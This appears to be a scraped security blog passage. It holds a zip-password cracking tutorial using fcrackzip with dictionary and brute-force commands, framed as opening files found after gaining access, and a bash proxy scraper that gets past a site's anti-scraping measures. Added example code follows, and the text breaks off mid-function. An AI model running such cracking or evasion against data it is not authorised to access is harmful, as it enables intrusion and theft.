<br />
<b>NOTE: </b>if you need to pause a scan for some reason you can issue the 'nessus_scan_pause <scanid>' command which will pause your scan. <br /><br />Once your scan has finished you might notice that the results have not yet actually been imported into Metasploit's database. This is because they are still on the Nessus server we connected to. We need to import them as we learned earlier so that everything pulls in. In order to do it this time we will use the Nessus plugin to handle it. You can issue the 'nessus_report_list' command to see a list of finished reports available to download and import; again you need to take note of the ID for the one you wish to work with. Once you know it, you simply get it with the 'nessus_report_get' command followed by the report ID, and now we have a scan run completely from within MSFCONSOLE and all results fully populated in the MSF database of our choosing. You can now take your time to search through the results and what is available in Metasploit to exploit each finding.<br />
<br />
Hope you enjoyed this follow up to the previous Nessus write-up. I referenced it before and received a few questions so hopefully this covers things in enough details to get you on your way. More to come soon, so stay tuned and until next time - Enjoy!<br />
<br />HRhttp://www.blogger.com/profile/05957795383670307007noreply@blogger.com1tag:blogger.com,1999:blog-8671806905307905831.post-68281371569338240252012-10-03T13:29:00.000-05:002012-10-03T13:29:11.129-05:00Cracking Password Protected Zip Files on Linux with FCRACKZIPI recently was given the keys to the castle and once inside I did the usual snooping around and well in the end I found myself with a collection of password protected Zip files that I knew had all kinds of juicy info inside. Now I have cracked protected Zip files in the past on Windows using a few tools some friends of mine made, but I had never done it since I had moved to my new Linux setup. I decided to make a little tutorial out of the whole incident for anyone interested or in a similar situation. In my search and review I ended up using a tool called FCRACKZIP, and this will be the focus for today's writeup. They actually support a Windows binary version whose syntax should be identical to what you're about to read. You can download the appropriate package for you from the maker's homepage here: <a href="http://oldhome.schmorp.de/marc/fcrackzip.html">FCRACKZIP</a>. <br />
<br />
If you are on a Linux machine you can install it using apt-get, like so:<br />
<br />
<b>COMMAND:</b> sudo apt-get install fcrackzip<br />
<br />
Now if you have some protected Zip files laying around then that's great, but if you don't you can perform a quick command to make one. Here is the syntax and quick example:<br />
<br />
<b>COMMAND:</b> zip --encrypt -r <ArchiveName> </target/U/want/2/zip><br />
<b>EXAMPLE: </b>zip --encrypt -r sup3rs3cr3t /home/hood3drob1n/Desktop/fcrackzip-TuT.txt<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/soQrw.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="301" src="http://i.imgur.com/soQrw.png" width="400" /></a></div>
<br />
<br />
You will get a prompt after you hit enter which will ask you to type in the password, and then again to confirm it. You should then have a password protected Zip file to use for further testing.<br />
<br />
First, as with any tool, we start by quickly reviewing the documentation and then the help menu. Here is quick shot of the main features as outlined in the help menu:<br />
<br />
<b>COMMAND: </b>fcrackzip --help<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/ogCMb.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="305" src="http://i.imgur.com/ogCMb.png" width="400" /></a></div>
<br />
<br />
I will note since it may not be clear at first that the '-c' charset option has a few options which will aid you if you are going to perform a straight bruteforce attack on the password:<br />
<b>a =></b> lower alpha charset [a-z]<br />
<b>A =></b> UPPER alpha charset [A-Z]<br />
<b>1 =></b> numerical charset [0-9]<br />
<b>! =></b> Special charset [!:$%&/()=?[]+*~#]<br />
<b>: =></b> Used to mark additional characters to add into the charset<br />
<br />
You should typically start with a wordlist and then move to bruteforcing after. In order to perform Dictionary based attack just point it at the wordlist and zip file you want to crack open:<br />
<br />
<b>COMMAND: </b>fcrackzip -D -p 500-worst-passwords.txt -u -v --method 2 sup3rs3cr3t.zip<br />
<b> => </b>try cracking using 500-worst-passwords.txt as our pass list<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/rXF8J.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="301" src="http://i.imgur.com/rXF8J.png" width="400" /></a></div>
<br />
<b>NOTE: </b>I experienced app crashes if I didn’t place the password list in the same location I was running fcrackzip from, so just do some copying or moving if you experience similar issues to work around the problem...<br />
<br />
Once you have exhausted your wordlist options you can move to bruteforce attacks. Now you can use the '-l <min>-<max>' option to set the min and max password lengths for bruteforce attacks, or you can use the '-p' init option to set the default value and starting string for cracking, for example:<br />
<br />
<b>COMMAND: </b>fcrackzip -b -c a -l 1-8 -u -v sup3rs3cr3t.zip<br />
<b>=></b> bruteforce attack using the lower alpha charset, testing for lengths 1-8<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/7F3xU.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="228" src="http://i.imgur.com/7F3xU.png" width="400" /></a></div>
<br />
<b>NOTE: </b>use of the '-u' option cuts down on the false positives as it actually tries to unzip the file using the password. It may increase load and time a little but will greatly cut down on false detections. I highly recommend using this option for pretty much all attacks...<br />
<br />
Another example using a bruteforce attack against a fixed length via the -p/init option. It works like so:<br />
<br />
<b>COMMAND: </b>fcrackzip -u -c a1 -p saaaaa sup3rs3cr3t.zip <br />
<b> => </b>test a-z0-9 but only for those of 6 char in length, starting at string 'saaaaa'<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/kwrx0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="http://i.imgur.com/kwrx0.png" width="400" /></a></div>
<br />
This sums up the general usage of fcrackzip and you should now be on your way to opening up all those pesky zip files you don't seem to have passwords for. I'm sure there are other tools out there, but this one worked well for me so thought I would share....<br />
<br />
Until next time, Enjoy!HRhttp://www.blogger.com/profile/05957795383670307007noreply@blogger.com13tag:blogger.com,1999:blog-8671806905307905831.post-8987313057832847722012-08-27T18:04:00.000-05:002012-08-27T18:04:34.475-05:00How to Build Your Own HideMyAss Proxy Scraper in BashI have received a number of emails from folks regarding my lack of maintaining of my free proxy list pages. A few of the emails were downright rude and offensive, but hey, it is the way of the net I suppose. Everyone wants to be a telephone or internet gangster....In an effort to help those who care and don’t mind a little effort I thought I would do my best to provide an easy solution to your proxy needs. I decided I will share a bit of bash knowledge and let you get your own. Give a man a fish and he will eat for a day, but teach a man to fish and he will eat for life........<br /><br />Today we will have a little fun and go over some bash basics which when put together can yield us a powerful proxy scraping script we can use to gather fresh proxies whenever we need. You can apply the concepts to other scripts to interact with the web in all sorts of fun ways. Hopefully you walk away with a cool script and if I am lucky a little bit of knowledge as well. This will not be a full bash tutorial but I will explain most of it as we go along, and I will provide some helpful reference links at the end to help you out if you are new and need or just want to learn more. Here goes.......<br /><br />In order to start any Bash script we need to first start it out with a Shebang! followed by the path to Bash (i.e. #!/bin/bash). This lets the system know that it should use the Bash interpreter for everything that follows. The Bash Shell is included on most, but not all, Linux Operating Systems. 
In most cases the same concepts will apply to other shells as well (Ksh, Dash, etc) however there may be some syntactical differences, in which case you can consult the error messages and your shells man page for likely solutions. In our case our first line Shebang looks like this:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/VJ3Wc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="97" src="http://i.imgur.com/VJ3Wc.png" width="400" /></a></div>
<br />
<b>NOTE: </b>you will need to save this with whatever name you want. The traditional bash script file ending is ".sh". You should also make your script executable after saving it using the 'chmod' command (chmod +x whatever.sh).<br />
<br />
We can use the '#' character to indicate comments through the end of the line. People often use this to leave comments throughout the script to let others know what is going on or how to use it. If you're placing comments in the body of the source they should help indicate the purpose of the functions being used in case you forget; it is also good for pointing out areas for optional user configuration - but keep them to a minimum if possible. We can add a quick comment to indicate this is a HMA Proxy Scraper Script. In addition to a general description comment I like to start most of my scripts off with a quick and simple function for handling system interrupts (i.e. CTRL+C). This can be handy for scripts which have a lot of moving parts and need to be wound down rather than a cold stop, or if cleanup activities are required prior to exiting. We can do this with the 'trap' command followed by our function name which will handle these signals, and INT for the interrupt signal to be trapped. We then build a function() which will be a series of commands run if the function is called. Functions allow us to keep our code cleaner and organized. They also allow us to re-use commonly repeated chunks of code rather than repeatedly re-typing the same code throughout the script every time it is needed. I also like to have my bashtrap() function exit with a status code other than 0, since most programs use the exit code to judge whether a script or command was executed successfully (0=success, anything other than 0=not success). Our base now looks like this:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/LRuIm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="http://i.imgur.com/LRuIm.png" width="400" /></a></div>
<br />
So now any time the interrupt (CTRL+C) is sent it will trigger the bashtrap() function, which uses the 'echo' command to print a message to output (the terminal in most cases) letting the user know the signal was received and that things are shutting down. The echo command prints whatever follows it. When using echo you need to be aware of its options if you don't want a new line with every use (-n) or need escape sequences interpreted (-e). You also need to be very aware of quoting in bash scripts, as different quoting results in different interpretations of the same code: bash expands variables and command substitutions inside double quotes, expands globs only in unquoted words, and leaves single-quoted text completely untouched. Now that we have our trap function out of the way we will want to create a banner of sorts to greet the user or to let them know the script has properly started. <br /><br />In order to make a simple greeting message we will focus on using echo to print our message in the terminal for the user to see. We can use the 'grep' command, which is designed to look for strings in text, to add a little color to our script text as well (a crude highlighter system). Echo prints our message and we use a pipe "|" to carry it through to the next command for processing, which is grep in this case. The '--color' option of grep highlights the matched string. One caveat: grep is a filter, so any line of the banner that does not contain the pattern is dropped rather than merely left uncolored; match on a string that appears in every line, or use grep --color -E 'pattern|$' so that every line passes through and only the pattern is highlighted. The grep command can be very useful for finding a needle in a haystack, as we will see more of in a few. Our script + our new simple welcome message ends up looking something like this:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/WC2Sm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="220" src="http://i.imgur.com/WC2Sm.png" width="400" /></a></div>
<br />
OK, now we have the basics out of the way it's time to start getting some things done. Our goal is to get a list of usable proxies from the HideMyAss free (and always fresh) proxy list. Once you have the concepts down you can apply the same methodology to scrape pretty much any other site for whatever it is you want. First we need to identify the target page or page range that we will want to consistently get information from. In most cases I do some good old fashioned web surfing in any old browser to find the magic page. In our case it is http://www.hidemyass.com/proxy-list/ and if we look at the bottom of the page there are actually up to 35 pages of proxies available. You can use many tools in Linux from the command line to fetch things from the web (wget, GET, Lynx, curl, etc), but I will be using curl for my purposes as I find it the easiest and most configurable, which makes it great for combining with bash to tackle the web. Entire books have been written about curl and its usage, and the libcurl library is used all over the place as well (PHP, C, etc). We will use it to grab the source of our target page and then use Linux system tools and bash kung-fu to check and extract the proxy addresses. In the end we will have a script which scrapes the site and places all proxies in a file for safe keeping while also printing them in the terminal for the user to see. We will also keep things clean and sort the final results to ensure there are no duplicates in there. The process from start to finish takes time and lots of patience, as some sites' anti-scraping methods can leave you with headaches for days while you try to figure them out; other times things go very quickly (literally in minutes). <br /><br />We will start by sending a curl request for the base page of proxies, which should contain the most recent postings on their site, and then work from there. 
curl takes the URL as a mandatory argument and then you can add optional arguments after it. For today's purpose we will need to keep a cookie file, since HMA has decided to use cookies as a basic guard. If you don't want to use a file for capturing and instead want to use a known cookie value you can do that too, by simply passing the cookie name and its value with -b. In addition to cookies we will want to add some options to our request to handle common network congestion problems, like setting retries (--retry), the delay between retries (--retry-delay), the connection timeout (--connect-timeout), and my favourite, the '-s' argument, which puts curl into silent mode and suppresses the progress meter and error messages that are otherwise printed as files are received (good for keeping our script looking clean when run; add -S if you still want errors shown). If you need or want to you can also add HTTP header fields (-H), a user-agent (-A) and a referrer (-e), which is handy for spoofing things as well. While building a new script you might want to redirect the basic output from a command to a local file for some base testing prior to placing it in the full blown script, but that's up to you. If you use a local intercepting proxy (Burp, ZAP, TamperData, etc) it is also very helpful for building the curl requests, since you can capture the entire HTTP request and reproduce the same request with curl. Make sure you read the curl help info multiple times and run through the basic tutorials they offer on the curl main site; it all comes in handy the more you use it. Here is what my base request looks like after using a local proxy to identify the cookie value (PHPSESSID) which was mandatory to view the page when using curl:<br />
<br />
Request to the main page, using the set cookie value, a spoofed referrer indicating we came from the main proxy page, and some helpful timing options (the PHPSESSID value below was my session at the time; yours will differ):<br /><br /><b>COMMAND:</b> curl http://www.hidemyass.com/proxy-list/1 -b "PHPSESSID=f0997g34g7qee5speh0bian143" --retry 2 --retry-delay 3 --connect-timeout 3 --no-keepalive -s -e "http://www.hidemyass.com/proxy-list/" 2> /dev/null > o.txt<br /><br /><b>OR </b>you could use the -c <file> option to write all cookies received into a file; note that -c only saves them, so to send them back on subsequent requests you pass the same file with -b <file>:<br /><br /><b>COMMAND:</b> curl http://www.hidemyass.com/proxy-list/1 -c cookiejar --retry 2 --retry-delay 3 --connect-timeout 3 --no-keepalive -s -e "http://www.hidemyass.com/proxy-list/" 2> /dev/null > o.txt<br /><br />If you open the o.txt file now you will find it is full of the source code of the main proxy page which we grabbed using the above curl command. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/5PMuM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="166" src="http://i.imgur.com/5PMuM.png" width="400" /></a></div>
<br />
If you used the '-c cookiejar' option you can open the file 'cookiejar' which was created upon the request being made and you will see a listing of any cookies set during the process, like so:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/446YQ.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="86" src="http://i.imgur.com/446YQ.png" width="400" /></a></div>
<br />
The first thing you may notice is that the IP addresses are not simply sitting there for us to grab (as they appear in the browser view); we are going to have to work for them. Take a minute to review the source, compare it to the browser version if you like, and eventually you will realize that the key pieces containing the proxy IP addresses live within particular sections of HTML. We will now use the 'grep' command to chop this page down in size, making things a little easier and limiting it to just the workable sections we want. It is all about baby steps for this kind of stuff....<br /><br />I noticed that each section of text I am interested in contains a recurring string, "<div style="display:none">". We will use this string with grep to eliminate all lines which don't contain it. In reviewing I also noticed that I am going to need the port, which sits 2 lines below the line grep finds. No worries, the '-A' argument tells grep to also print the 2 lines after each matching line (-B prints lines before the match). Be aware that grep inserts a '--' separator line between non-adjacent groups of matches, which we will have to strip later. Now we can limit things to just the sections we are interested in using grep + the -A option. The curl piece now looks like so:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/Or7it.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="166" src="http://i.imgur.com/Or7it.png" width="400" /></a></div>
<br />
If you now open o.txt you will find it has been cut down enormously compared to the first source pull above, and now contains a repeated format we can keep whittling down and working with. To clean things up further we need another Linux system tool named 'sed', a powerful stream editor. We can use sed to find strings like grep does, but sed can also manipulate the strings we feed it (delete, replace, etc). We will use this to our advantage to remove a lot of the HTML tags which are in our way. sed deserves its own tutorials if you are unfamiliar, as there is a lot to it, but it's easy enough to pick up so don't be scared; the links at the end should help. Since we don't have HTML parsing classes like other scripting languages we just need to be patient and remove things one by one until we have it the way we want it. You can chain sed commands together (sed -e cmd1 -e cmd2 ... OR sed 'cmd1;cmd2;...') or even place them all in a file and run them as a series, which means we can do a lot with a little if structured properly. <br /><br />I will start by removing the many closing '</style>' tags which are scattered throughout. Notice that we have to escape certain characters when providing our string to sed. The '/' is the delimiter separating the parts of the s command, so an unescaped '/' inside the pattern would end the pattern early at '<'; escaping it as '\/' makes sed match the full '</style>'.<br />
<br /><b>COMMAND:</b> sed -e 's/string/replacement/g'<br />
s = substitute, g = globally, i.e. every occurrence on the line instead of just the first one<br />
<br /><b>COMMAND:</b> sed -e 's/<\/style>//g'<br /><br />This '</style>' tag appears as the first thing on the lines which have our IP addresses. The command substitutes (s) the '</style>' tag with nothing, and since we used the (g) flag it does so for every occurrence found in the stream (we pipe the text in via our script and adjust the output on the fly). We will continue removing basic tags and items which stand in our way using the following sed chain; the '\-\-' expression removes the '--' group separators grep -A inserted, '/^$/d' deletes empty lines, and the last expression swaps underscores for hyphens: <br />
<br /><b>COMMAND: </b>sed -e 's/<\/style>//g' -e 's/\-\-//g' -e 's/ <td>//g' -e '/^$/d' | sed -e 's/_/-/g'<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/NjopG.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="166" src="http://i.imgur.com/NjopG.png" width="400" /></a></div>
<br />
This gets us down a little more, but if you review the source you begin to realize that the IP address is scrambled in with some random numbers. They are using anti-scraping techniques to try and trick us, or at least give us a hard time. To work around this, we will replace the chosen target strings with a marker instead of simply removing them (as we did in the last step). You will see in a minute that this helps tremendously in identifying which numbers are usable and which are decoys. Let's use the same technique as above to replace the main HTML <span> and <div> opening tags, and everything in them, with '~' characters which we will use as markers in the coming steps. Because there are variations in how the tags are formatted we can't write one blanket statement, so we lean on sed's regular expressions (POSIX basic regular expressions, where a bracket expression like [a-z] and an interval like \{1,4\} let one expression match several variants). Here is what I came up with for this piece (each -e is another expression appended to the same sed chain):<br />
<br />
<b>COMMAND:</b> -e 's/<span class="[a-zA-Z\-]\{1,4\}">/~/' -e 's/<div style=\"display:none\">/~/g' -e 's/<span class=\"[a-zA-Z0-9\-]\{1,4\}\">/~/g' -e 's/<span class=\"\" style=\"\">/~/g' -e 's/<span style=\"display: inline\">/~/g' -e 's/<span style=\"display:none\">/~/g'<br />
<br />
Let me explain one of the funny-looking pieces in case it isn't fully clear: <br />
<b>COMMAND:</b> sed -e 's/<span class="[a-zA-Z\-]\{1,4\}">/~/'<br />
<br />
This piece replaces anything of the form "<span class="XXX">", where XXX is 1 to 4 characters drawn from a-z, A-Z and the '-' character. So abc, xY-z, a-b- or Q would all be valid matches, while x2 would not, since digits are not in this class (the third expression in the chain uses [a-zA-Z0-9\-] to catch those). This works because the class name seems to change at random, but to our advantage it remains within a known character set and a predictable length. <b>NOTE</b> the backslashes: '\{' and '\}' are how sed's basic regular expressions write an interval (a bare '{' is just a literal brace), and the whole expression sits in single quotes, so bash itself performs no expansion on it. The backslash before the '-' inside the brackets is not actually required: a hyphen placed last in a bracket expression is literal, and a backslash inside brackets is itself taken literally (so the class quietly also allows a backslash, which is harmless here). Also note that this first expression has no 'g' flag, so it only replaces the first match on each line; the later [a-zA-Z0-9\-] expression with 'g' covers the rest, which is why the output still comes out right.<br /><br />Once we place our markers things start to look like the end is near....<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/bUdrR.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="166" src="http://i.imgur.com/bUdrR.png" width="400" /></a></div>
<br />
We're getting so close....a bit more HTML tag cleanup, this time back to straight removal or a swap with nothing technically....<br />
<br /><b>COMMAND: </b>sed -e 's/<\/div>//g' -e 's/<\/span>//g' -e 's/<\/td>//g' -e 's/<span>//g' <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/E11Ks.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="166" src="http://i.imgur.com/E11Ks.png" width="400" /></a></div>
<br />
OK, now we have something workable. Before we move on to deciphering our results we need one last bit of cleanup to remove any '~' character that occurs as the first thing on a line (other occurrences are left alone; only a leading '~' is affected). We use the '^' character to anchor the match to the start of the line, which also makes the 'g' flag redundant here, though harmless (see the sed man page and the reference links at the end for full details on '^' and on '&', which stands for the matched text in a replacement)...<br /><br /><b>COMMAND: </b>sed -e 's/^~//g'<br />
<br />
<b>COMMAND: </b>curl http://www.hidemyass.com/proxy-list/1 -b "PHPSESSID=f0997g34g7qee5speh0bian143" --retry 2 --retry-delay 3 --connect-timeout 3 --no-keepalive -s -e "http://www.hidemyass.com/proxy-list/" 2> /dev/null | grep -A2 '<div style=\"display:none\">' | sed -e 's/<\/style>//g' -e 's/\-\-//g' -e 's/ <td>//g' -e '/^$/d' -e 's/_/-/g' -e 's/<span class="[a-zA-Z\-]\{1,4\}">/~/' -e 's/<div style=\"display:none\">/~/g' -e 's/<span class=\"[a-zA-Z0-9\-]\{1,4\}\">/~/g' -e 's/<span class=\"\" style=\"\">/~/g' -e 's/<span style=\"display: inline\">/~/g' -e 's/<span style=\"display:none\">/~/g' -e 's/<\/div>//g' -e 's/<\/span>//g' -e 's/<\/td>//g' -e 's/<span>//g' -e 's/^~//g' > o.txt<br />
<br />
OK, now we have a base but it still needs some work. Starting at line 1 we now have the IP on every other line with the associated PORT on the following line. The IP lines still have the anti-scrape random digits in them. To work around this I decided to use a WHILE loop that reads the stripped-down HMA source (o.txt) line by line. Inside the loop we use a few variables and a counter tied to if statements, which lets us perform the appropriate action depending on whether we are working on an IP or a PORT line. The PORT is rather simple to pull since it now stands on its own. The IP address we need to pull piece by piece. To grab it we introduce another great Linux tool, 'awk'. awk is a pattern-scanning and text-processing language rather than just an editor, with built-in field splitting and variables that let it get rather complex and powerful (on its own, and even more so when paired with grep, sed and other scripts and tools). <br /><br />I set each piece of the IP to its own variable ($IP1 to $IP4) and one for PORT as well, and set them to empty values before filling them to avoid stale data. We keep a simple counter that alternates between 1 and 2, resetting after the commands for 2 have run, which keeps us in step with the every-other-line layout; its base value is 0. We cat the file we dumped the source to and pipe it into the while read loop, setting each line to the variable named 'line' (you can name it anything you like; most people use line since you are reading line by line). A cleaner equivalent is 'while read -r line; do ...; done < o.txt', which avoids the extra cat process and, with -r, keeps backslashes in the input intact. Since we start with IP on line 1 and PORT on line 2 we can use the count: if 1, process the IP variables; if 2, process the PORT variable. To get the IP properly we simply run four separate awk extractions, one per octet. 
The markers we placed earlier (~) help us, along with the facts that each section of the IP address follows the '.' character splitting it from the previous one and that the first set of digits is always the real start of the IP. We echo the current line and pass it to awk, whose '-F' option sets the field separator awk uses to split the line into fields (columns), each of which can be printed by referencing its positional variable ($1, $2, ...). We throw in a little sed to remove our markers, and doing this four times while keeping track of the '.' and '~' characters leaves us with variables we can piece back together to form the real IP address. Once we have all the pieces we simply print them and redirect them to a file for safe keeping...<br /><br />Once we add in the loop our script starts to take some shape and now appears similar to the below:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/M4ASU.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="273" src="http://i.imgur.com/M4ASU.png" width="400" /></a></div>
<br />
This should now successfully scrape the first page from HideMyAss free proxy lists and return a clean listing of the IP and Port for each one and store it in a file for safe keeping (p.txt).<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/1zK5I.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://i.imgur.com/1zK5I.png" width="327" /></a></div>
<br />
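The decode stage as one runnable filter, added here as an example and not the post's own script (the post's loop is in the screenshots above). It pushes a constructed page fragment that imitates the decoy-digit trick, with hidden classes declared in a per-row <style> block plus hidden <div>/<span> decoys, through the same grep -A2, sed and awk toolset. The markup and the addresses are made up for the example, and the real page's tags and class names vary from run to run, so treat the patterns as a starting point rather than a drop-in.<br />

```bash
#!/usr/bin/env bash
# Added example, not the post's script: the decode stage (grep -A2 ->
# sed -> awk) run over a constructed page fragment that mimics the
# decoy-digit obfuscation described in the walkthrough. The markup is
# made up for this example; the real page's tags differ between runs.

# Constructed input: two proxy rows whose real values are
# 203.0.113.25:8080 and 198.51.100.7:3128. Each row has a <style> block
# that hides some class names, hidden <div>/<span> decoys carrying bogus
# digits, and the port two lines below the IP line.
SAMPLE_HTML='<table>
<tr>
<td><span><style>.h1{display:none}.v1{display:inline}</style><div style="display:none">99</div>203<span class="h1">12</span>.<span class="v1">0</span>.<span style="display:none">8</span>113.<span class="v1">25</span></span></td>
 <td>
8080</td>
</tr>
<tr>
<td>unrelated row</td>
</tr>
<tr>
<td><span><style>.k{display:none}.m-2{display:inline}</style><div style="display:none">1</div>198<span style="display:none">55</span>.<span class="k">4</span>51.<span class="m-2">100</span>.7</span></td>
 <td>
3128</td>
</tr>
</table>'

# Read page HTML on stdin, print one "IP:PORT" per proxy on stdout.
decode_proxies() {
  grep -A2 '<div style="display:none">' \
  | sed -e '/^--$/d' -e '/^ *<td> *$/d' \
  | awk '
    NR % 2 == 1 {                      # odd lines: the obfuscated IP
      line = $0
      split("", hidden)                # class names this row hides
      if (match(line, /<style>[^<]*<\/style>/)) {
        css = substr(line, RSTART + 7, RLENGTH - 15)
        n = split(css, rule, "}")
        for (i = 1; i <= n; i++) if (rule[i] ~ /display:none/) {
          sub(/^\./, "", rule[i]); sub(/[{].*/, "", rule[i])
          hidden[rule[i]] = 1
        }
        line = substr(line, 1, RSTART - 1) substr(line, RSTART + RLENGTH)
      }
      # decoys hidden inline go away together with their contents
      gsub(/<(div|span) style="display:none">[^<]*<\/(div|span)>/, "", line)
      # class-based spans: drop the hidden ones, unwrap the visible ones
      while (match(line, /<span class="[^"]*">[^<]*<\/span>/)) {
        tag = substr(line, RSTART, RLENGTH)
        cls = tag; sub(/^<span class="/, "", cls); sub(/".*/, "", cls)
        body = tag; sub(/^<span class="[^"]*">/, "", body); sub(/<\/span>$/, "", body)
        keep = (cls in hidden) ? "" : body
        line = substr(line, 1, RSTART - 1) keep substr(line, RSTART + RLENGTH)
      }
      gsub(/<[^>]*>/, "", line)        # strip the remaining wrapper tags
      gsub(/[^0-9.]/, "", line)        # what is left should be the IP
      ip = line
      next
    }
    {                                  # even lines: the port
      port = $0; gsub(/[^0-9]/, "", port)
      if (ip ~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/ && port != "") print ip ":" port
      ip = ""
    }
  '
}

printf '%s\n' "$SAMPLE_HTML" | decode_proxies
```

The awk part is the piece worth keeping: instead of guessing which digits are real from their position, it reads the row's own <style> block to learn which classes are hidden, so a row that hides a different class name still decodes correctly. On a live page you would replace the printf with the curl fetch and expect to adjust the three tag patterns.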
You could stop now if you wanted, but we will spend a few more minutes to clean it up and make it just a little bit better...<br /><br />We will add a few more lines to clean the results. We can use the 'sort' and 'uniq' commands to put them in order, which helps arrange them by IP block, and to remove any duplicates which might be in the list (note that plain sort orders the text lexically, so 10.x.x.x lands before 2.x.x.x, and that sort -u does the sorting and de-duplication in one step). To accomplish this we just use some piping and redirect the final output to a new file, which will be our final results file. Since we redirect the full output to the file nothing is presented to the user, so to counter this we print an exit message which tells them how many are now in the final list. We then remove the temp files we used for building (o.txt & p.txt), and when the end of the file is reached the script completes and ends on its own. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/GovuC.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="161" src="http://i.imgur.com/GovuC.png" width="400" /></a></div>
<br />
If you don't want to use fixed files like o.txt or p.txt you can use a more user- and system-friendly feature via the 'mktemp' command. This creates uniquely named temporary files, which you should remove once done (add them to the bashtrap() cleanup as well, so an interrupted run does not leave them behind). Simply create a variable at the start of the script to hold the temp file name, replace all occurrences of o.txt and p.txt with your new variable names ("$STOR" and "$STOR2"), and set the below variables at the start of the script:<br />===========================================================================================================================<br />JUNK=/tmp<br />STOR=$(mktemp -p "$JUNK" -t fooooobarproxyscraper.tmp.XXX)<br />STOR2=$(mktemp -p "$JUNK" -t fooooobarproxyscraper2.tmp.XXX)<br />===========================================================================================================================<br /><b>NOTE:</b> the template must end in at least three X's (XXX is the minimum; more X's give a less guessable name), which mktemp replaces with random characters; -p specifies the temp folder location. GNU mktemp marks -t as deprecated, so mktemp "$JUNK/fooooobarproxyscraper.XXXXXX" is the more portable spelling.<br /><br />We can also increase our grab area by leveraging curl's ability to perform some mild expansion (URL globbing), much like bash. With a minor tweak to our initial curl command we can grab multiple pages instead of just a single one. HMA has 35 pages available but for all intents and purposes only the first 5 are typically usable and fresh, so let's tweak it to grab the first 5 pages instead of just the 1. <br /><br />We change this:<br /><b>COMMAND: </b>curl http://www.hidemyass.com/proxy-list/1<br /><br />to this:<br /><b>COMMAND: </b>curl http://www.hidemyass.com/proxy-list/<b>[1-5]</b><br /><br />With this minor change curl issues the request once for each page, 1 through 5, and writes the responses one after another to its output. Alter it to grab all 35 pages if you like!<br /><br />Piece it all together and you now have a quick and easy script capable of scraping a decent number of usable proxies from HideMyAss. 
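For the housekeeping half (the trap from the start of the post, mktemp, curl page ranges, sort/uniq and the exit message), here is an added example that is not the post's script. It assumes the HMA URL from the walkthrough in fetch_pages(), makes no network call on its own, and uses a few constructed ip:port lines to exercise the final clean-up step; the decode stage that turns the HTML into those lines is a separate filter and is not included here.<br />

```bash
#!/usr/bin/env bash
# Added example, not the post's script: the housekeeping side of the
# scraper. Temp files come from mktemp, CTRL+C runs a handler that cleans
# up and exits non-zero, curl URL globbing fetches a page range in one
# call, and the final list is validated, ordered and de-duplicated. The
# decode stage (HTML -> ip:port lines) is a separate filter not shown
# here; the HMA URL in fetch_pages() is assumed from the walkthrough.

set -u

JUNK=${TMPDIR:-/tmp}
STOR=$(mktemp "$JUNK/proxyscraper.XXXXXX")              # final list
STOR2=$(mktemp "$JUNK/proxyscraper2.XXXXXX")            # decoded ip:port lines
COOKIEJAR=$(mktemp "$JUNK/proxyscraper-cookies.XXXXXX")

cleanup() { rm -f "$STOR" "$STOR2" "$COOKIEJAR"; }

# Interrupt handler: tell the user, remove temp files, exit 130 (128 + SIGINT).
bashtrap() {
  echo "CTRL+C received, shutting down..." >&2
  cleanup
  exit 130
}
trap bashtrap INT
trap cleanup EXIT   # also fires on normal completion and on errors

# Fetch pages FIRST..LAST with one curl call. curl expands "[1-5]" itself,
# and using the same jar for -c and -b replays cookies set by page 1 on
# the following pages without hard-coding a PHPSESSID. Not called below.
fetch_pages() {
  first=$1; last=$2
  curl -s --retry 2 --retry-delay 3 --connect-timeout 3 --no-keepalive \
       -c "$COOKIEJAR" -b "$COOKIEJAR" \
       -e "http://www.hidemyass.com/proxy-list/" \
       "http://www.hidemyass.com/proxy-list/[$first-$last]"
}

# Keep only well-formed ip:port lines, order them numerically by octet
# (plain sort is lexical and puts 10.x after 1.x but before 2.x), and
# drop duplicates, which the sort leaves adjacent for uniq.
finalize_list() {
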